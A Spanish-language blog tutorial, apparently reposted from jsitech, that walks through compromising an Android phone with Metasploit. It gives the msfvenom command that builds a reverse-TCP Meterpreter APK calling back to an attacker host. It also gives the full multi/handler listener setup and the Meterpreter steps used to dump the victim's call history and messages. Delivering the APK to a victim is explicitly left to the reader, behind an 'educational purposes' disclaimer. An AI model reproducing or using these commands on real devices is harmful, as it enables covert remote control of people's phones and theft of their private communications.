androidowned.jpg

Una de mis herramientas de seguridad favorita es Metasploit, y es por todas las funcionalidades que este framework nos da para realizar pruebas de seguridad a diversas plataformas. Hoy vamos a ver como podemos comprometer un equipo Android simplemente creando un APK malicioso que haga una conexión a nuestra máquina atacante, solo veremos lo de crear el ataque, la parte de lograr que su usuario instale y ejecute el APK, se los dejo a ustedes.

Este post lo realizo usando, un Motorola con Android 4.4, Kali Linux y Metasploit.

Para crear el APK Malicioso vamos a utilizar MSFvenom y nuestra máquina atacante es la 10.0.0.11

Creamos el Archivo Malicioso

# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.11 LPORT=4444 > kali.apk

Si verificamos, nos creo un archivo kali.apk, este es el que debemos lograr que nuestra víctima instale y ejecute, como les dije, la forma en que lo hagan llegar al equipo víctima se los dejo a ustedes.

De vuelta a mi motorola de prueba, copio el archivo al almacenamiento, y procedo con la instalación.

Se fijan en todos los Permisos que pide, y que la mayoría de los usuarios nunca se detienen a revisar.

Finalizamos con la instalación, tendremos una app con nombre MainActivity.

Antes de ejecutarla, debemos abrir metasploit en nuestra máquina atacante y configurar el Listener para esperar la conexión. El payload que seleccionemos debe ser el mismo con el que creamos el APK malicioso.

# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

PAYLOAD => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 10.0.0.11

LHOST => 10.0.0.11

msf exploit(handler) > set LPORT 4444

LPORT => 4444

msf exploit(handler) > run

Ya aquí tenemos nuestra máquina lista para esperar la conexión, solo es esperar que ejecuten la app maliciosa en el equipo android. Cuando lo hagan, tendremos una linda sesión en Meterpreter.

Se accedemos a la ayuda, veremos todo lo que podemos obtener y hacer con equipo.

Meterpreter > ?

Aquí un pequeño ejemplo.

Si corremos sysinfo, podemos comprobar que dicha sesión es realmente al equipo android.

Meterpreter > sysinfo

Podemos revisar si el equipo tiene acceso root, hacer un dump del historial de llamadas y muchas cosas mas.

android5.png

En el caso de los dumps, si accedemos a los archivos creamos, veremos toda una lista detallada de los mensajes y las llamadas.

Yo verificaría muy bien antes de instalar una app de una fuente no confiable.

Hasta aquí, pero no sin antes recordarles que todo lo que vemos aquí es para fines Educativos.

 

Fuente: jsitech

¿Quién está en línea?

Hay 2110 invitados y ningún miembro en línea